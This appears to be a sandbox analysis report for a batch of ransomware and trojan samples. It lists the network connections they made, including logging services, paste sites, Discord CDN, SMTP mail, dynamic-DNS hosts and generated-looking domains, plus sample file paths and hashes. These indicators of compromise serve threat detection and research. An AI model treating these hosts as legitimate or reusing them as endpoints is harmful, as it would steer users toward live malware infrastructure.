| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | 227.179.250.142.in-addr.arpa | udp |
| US | 185.199.110.133:443 | gist.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | gist.githubusercontent.com | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 8.8.8.8:53 | speeddatingstudio.com | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 8.8.8.8:53 | 46.2.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| DE | 185.220.101.200:8443 | | tcp |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| US | 8.8.8.8:53 | f0558986.xsph.ru | udp |
| RU | 141.8.197.42:80 | f0558986.xsph.ru | tcp |
| NL | 45.66.35.11:80 | 45.66.35.11 | tcp |
| US | 8.8.8.8:53 | 200.101.220.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.219.218.216.in-addr.arpa | udp |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| US | 8.8.8.8:53 | 11.35.66.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.197.8.141.in-addr.arpa | udp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 8.8.8.8:53 | pastebin.pl | udp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 104.21.46.76:443 | pastebin.pl | tcp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| US | 8.8.8.8:53 | 76.46.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | online-stock-solutions.com | udp |
| US | 8.8.8.8:53 | the-lead-bitter.com | udp |
| US | 8.8.8.8:53 | ssofhoseuegsgrfnu.ru | udp |
| US | 170.39.226.155:80 | ssofhoseuegsgrfnu.ru | tcp |
| US | 8.8.8.8:53 | ww88.ssofhoseuegsgrfnu.ru | udp |
| US | 199.59.243.226:80 | ww88.ssofhoseuegsgrfnu.ru | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 155.226.39.170.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.243.59.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | glitterandsparkle.net | udp |
| NL | 92.63.197.48:80 | | tcp |
| US | 104.21.65.24:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | znpst.top | udp |
| US | 8.8.8.8:53 | rlrz.org | udp |
| DE | 92.246.89.93:80 | znpst.top | tcp |
| US | 8.8.8.8:53 | rlrz.org | udp |
| US | 8.8.8.8:53 | rlrz.org | udp |
| RU | 77.88.21.158:587 | smtp.yandex.com.tr | tcp |
| US | 8.8.8.8:53 | rlrz.org | udp |
| US | 8.8.8.8:53 | slpsrgpsrhojifdij.ru | udp |
| DE | 92.246.89.93:80 | slpsrgpsrhojifdij.ru | tcp |
| US | 8.8.8.8:53 | rlrz.org | udp |
| DE | 103.252.90.236:9200 | | tcp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 8.8.8.8:53 | 236.90.252.103.in-addr.arpa | udp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 8.8.8.8:53 | aiiaiafrzrueuedur.ru | udp |
| DE | 92.246.89.93:80 | aiiaiafrzrueuedur.ru | tcp |
| MD | 176.123.8.5:9001 | | tcp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| NL | 45.66.35.11:80 | 45.66.35.11 | tcp |
| US | 8.8.8.8:53 | 5.8.123.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fuaiuebndieufeufu.ru | udp |
| US | 8.8.8.8:53 | eiifngjfksisiufjf.ru | udp |
| US | 8.8.8.8:53 | eoroooskfogihisrg.ru | udp |
| US | 8.8.8.8:53 | noeuaoenriusfiruu.ru | udp |
| US | 8.8.8.8:53 | iuirshriuisruruuf.ru | udp |
| US | 8.8.8.8:53 | afeifieuuufufufuf.ru | udp |
| US | 8.8.8.8:53 | srndndubsbsifurfd.ru | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 8.8.8.8:53 | fiiauediehduefuge.ru | udp |
| US | 44.221.84.105:80 | fiiauediehduefuge.ru | tcp |
| US | 8.8.8.8:53 | 105.84.221.44.in-addr.arpa | udp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 8.8.8.8:53 | nousiieiffgogogoo.ru | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 8.8.8.8:53 | fifiehsueuufidhfi.ru | udp |
| US | 8.8.8.8:53 | eofihsishihiursgu.ru | udp |
| US | 8.8.8.8:53 | nnososoosjfeuhueu.ru | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | ssofhoseuegsgrfnj.su | udp |
| DE | 92.246.89.93:80 | ssofhoseuegsgrfnj.su | tcp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| SE | 188.151.237.158:443 | | tcp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| US | 8.8.8.8:53 | 158.237.151.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | slpsrgpsrhojifdij.su | udp |
| US | 8.8.8.8:53 | aiiaiafrzrueuedur.su | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | fuaiuebndieufeufu.su | udp |
| US | 8.8.8.8:53 | eiifngjfksisiufjf.su | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | eoroooskfogihisrg.su | udp |
| US | 8.8.8.8:53 | noeuaoenriusfiruu.su | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | iuirshriuisruruuf.su | udp |
| US | 8.8.8.8:53 | afeifieuuufufufuf.su | udp |
| DE | 92.246.89.93:80 | afeifieuuufufufuf.su | tcp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| RU | 77.88.21.158:587 | smtp.yandex.com.tr | tcp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| GB | 178.79.163.170:9001 | | tcp |
| NL | 45.66.35.11:80 | 45.66.35.11 | tcp |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| US | 8.8.8.8:53 | 170.163.79.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | srndndubsbsifurfd.su | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | fiiauediehduefuge.su | udp |
| US | 8.8.8.8:53 | nousiieiffgogogoo.su | udp |
| US | 8.8.8.8:53 | fifiehsueuufidhfi.su | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | eofihsishihiursgu.su | udp |
| US | 8.8.8.8:53 | nnososoosjfeuhueu.su | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | ssofhoseuegsgrfnj.in | udp |
| US | 208.100.26.245:80 | ssofhoseuegsgrfnj.in | tcp |
| US | 8.8.8.8:53 | 245.26.100.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | slpsrgpsrhojifdij.in | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | aiiaiafrzrueuedur.in | udp |
| US | 8.8.8.8:53 | fuaiuebndieufeufu.in | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | eiifngjfksisiufjf.in | udp |
| US | 104.21.46.76:443 | pastebin.pl | tcp |
| US | 44.213.104.86:80 | eiifngjfksisiufjf.in | tcp |
| US | 8.8.8.8:53 | 86.104.213.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | eoroooskfogihisrg.in | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| DE | 46.232.251.191:444 | | tcp |
| NL | 45.66.35.11:80 | 45.66.35.11 | tcp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 8.8.8.8:53 | 191.251.232.46.in-addr.arpa | udp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 8.8.8.8:53 | noeuaoenriusfiruu.in | udp |
| US | 8.8.8.8:53 | iuirshriuisruruuf.in | udp |
| US | 44.221.84.105:80 | iuirshriuisruruuf.in | tcp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 8.8.8.8:53 | afeifieuuufufufuf.in | udp |
| US | 8.8.8.8:53 | srndndubsbsifurfd.in | udp |
| US | 8.8.8.8:53 | fiiauediehduefuge.in | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | nousiieiffgogogoo.in | udp |
| RU | 77.88.21.158:587 | smtp.yandex.com.tr | tcp |
| US | 8.8.8.8:53 | fifiehsueuufidhfi.in | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | eofihsishihiursgu.in | udp |
| US | 8.8.8.8:53 | nnososoosjfeuhueu.in | udp |
| US | 8.8.8.8:53 | ssofhoseuegsgrfnj.net | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | slpsrgpsrhojifdij.net | udp |
| SG | 13.251.16.150:80 | slpsrgpsrhojifdij.net | tcp |
| US | 8.8.8.8:53 | 150.16.251.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | aiiaiafrzrueuedur.net | udp |
| RU | 185.215.113.66:80 | aiiaiafrzrueuedur.net | tcp |
| US | 8.8.8.8:53 | 66.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fuaiuebndieufeufu.net | udp |
| US | 8.8.8.8:53 | eiifngjfksisiufjf.net | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | eoroooskfogihisrg.net | udp |
| US | 8.8.8.8:53 | noeuaoenriusfiruu.net | udp |
| US | 8.8.8.8:53 | iuirshriuisruruuf.net | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | afeifieuuufufufuf.net | udp |
| US | 8.8.8.8:53 | 252.15.104.51.in-addr.arpa | udp |
| CA | 144.217.32.158:9003 | | tcp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| US | 8.8.8.8:53 | srndndubsbsifurfd.net | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | fiiauediehduefuge.net | udp |
| US | 8.8.8.8:53 | nousiieiffgogogoo.net | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| SG | 18.141.10.107:80 | nousiieiffgogogoo.net | tcp |
| US | 8.8.8.8:53 | 107.10.141.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fifiehsueuufidhfi.net | udp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 8.8.8.8:53 | eofihsishihiursgu.net | udp |
| US | 44.213.104.86:80 | eofihsishihiursgu.net | tcp |
| US | 8.8.8.8:53 | ssofhoseuegsgrfnj.biz | udp |
| US | 54.244.188.177:80 | ssofhoseuegsgrfnj.biz | tcp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | 177.188.244.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| DE | 193.122.6.168:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | slpsrgpsrhojifdij.biz | udp |
| RU | 77.88.21.158:587 | smtp.yandex.com.tr | tcp |
| US | 8.8.8.8:53 | 168.6.122.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | aiiaiafrzrueuedur.biz | udp |
Files
C:\Users\Admin\AppData\Local\Temp\7zECCF816C7\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe
| MD5 | a8f2c9b1c6dc9022290900cbf27af571 |
| SHA1 | 0bd9ba9ebaf967649c102989a1b28394840106ee |
| SHA256 | d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b |
| SHA512 | 60f92d9829283ce05f8aaa13466d572e8772d29b699f782f37bb05d232dcf33bca883f1549e2b6ac9d211b7879042f25a973a57460548e7ba4fafbe057826d29 |
C:\Users\Admin\AppData\Local\Temp\7zECCF816C7\00486\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1.exe
| MD5 | 31cf5a53a640bc9a073cbe777a2183ce |
| SHA1 | 10941c1910e473bf0b8fb0617bf5f39bda577d81 |
| SHA256 | c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1 |
| SHA512 | 4d59ff48d939016a001ad18819e115c9c3a83bc6d41d5ce6ff9ceb0496753e53ac61420eb061235ffac5dd3d2e84cf6f07c87db11cc151cfc96a94c4b6eea0e8 |
C:\Users\Admin\AppData\Local\Temp\7zECCF816C7\00486\HEUR-Trojan.Win32.Kryptik.gen-0da5a04cdcc8fec504878f3b3062ac390b49ff6f0a304cd2e08c7b344a0aeab0.exe
| MD5 | 7bf5be704b75c4924b5a29a8ab05ea30 |
| SHA1 | 53aa3fd3f60aad9b980cb3ed0d1f169add0530b6 |
| SHA256 | 0da5a04cdcc8fec504878f3b3062ac390b49ff6f0a304cd2e08c7b344a0aeab0 |
| SHA512 | be3487e110e5dd9db83b3f0cd1b6e467cf06b613a4bc19cb3bae66100d0bc827948a36c67a78fadca3f88503dbc5bf7eb931a1c4f89318cd0fe167127e5ced42 |
C:\Users\Admin\AppData\Local\Temp\7zECCF816C7\00486\HEUR-Trojan.Win64.Kryptik.gen-6442c3d57a02a1469c283a3a1a170fdc31b412993de9806b2738e73501ce0e81.exe
| MD5 | 448096c67b45deb3c7593aa88fb86b75 |
| SHA1 | c60c8cc75a3a2950dcb78fc4094007b13c7b099f |
| SHA256 | 6442c3d57a02a1469c283a3a1a170fdc31b412993de9806b2738e73501ce0e81 |
| SHA512 | 042f276950948d7d7ba3f3965525cb0c64277b7f31e12742bb280e1b520dbb74274253eae748a148d68ee93eb713930bec0b7499a2e5f0202ba0b74975a8d237 |
C:\Users\Admin\AppData\Local\Temp\7zECCF816C7\00486\Trojan-Ransom.Win32.Cryptodef.aoo-fffbd669ccfaca780362d00cc3d7b165bb9f68a3902dc1fa9a099ecb706f3adc.exe
| MD5 | 18ffed6f715aea3ba8cd567b330faf20 |
| SHA1 | 8f835470057ba4f832e812fc9f58dd42c0a7acc4 |
| SHA256 | fffbd669ccfaca780362d00cc3d7b165bb9f68a3902dc1fa9a099ecb706f3adc |
| SHA512 | c863ac250d1dac03362ce0fd9b5f3ccb0e45084e0715533dede7ab420eb7b4a7fb58228ad3d9c516352a8474ff07c205c64e7709b9d5a7ee5490bfa6e10e51ff |
C:\Users\Admin\AppData\Local\Temp\7zECCF816C7\00486\Trojan-Ransom.Win32.GenericCryptor.czo-877fe5837cf0d0c2637ef6728da31841094501dc61257722698b38828f895f66.exe
| MD5 | 03531048f4d9369c850888945181cf43 |
| SHA1 | 1e214deb22fa4dd095d9351d91ac5563aad5e7ba |
| SHA256 | 877fe5837cf0d0c2637ef6728da31841094501dc61257722698b38828f895f66 |
| SHA512 | f312faed2f987a9da2ee145f078645825f2785ce483ded263fa3b3d6a884a5e67cad3ffde8dff4a82c67b010262926365d8f947c74dec04a26ee2703f2ecdbea |
C:\Users\Admin\AppData\Local\Temp\7zECCF816C7\00486\Trojan-Ransom.Win32.GenericCryptor.czx-e15b06cf1255a93e42d5d558c3e65f09dac5c8564873d359da061b78be324894.exe
| MD5 | e3584b71a215db2c629e6e2877edd6b4 |
| SHA1 | 01bee60375b7a275f818b051ddc0ddb4a8426006 |
| SHA256 | e15b06cf1255a93e42d5d558c3e65f09dac5c8564873d359da061b78be324894 |
| SHA512 | d57474c0cdf0df95b703afbfb1f801765b4fe1030eff1fc1ef971da0392474c585f0c5ce57918528d0a61fce6feaf49b0a80e614f183fede6aa74f6436ea94bf |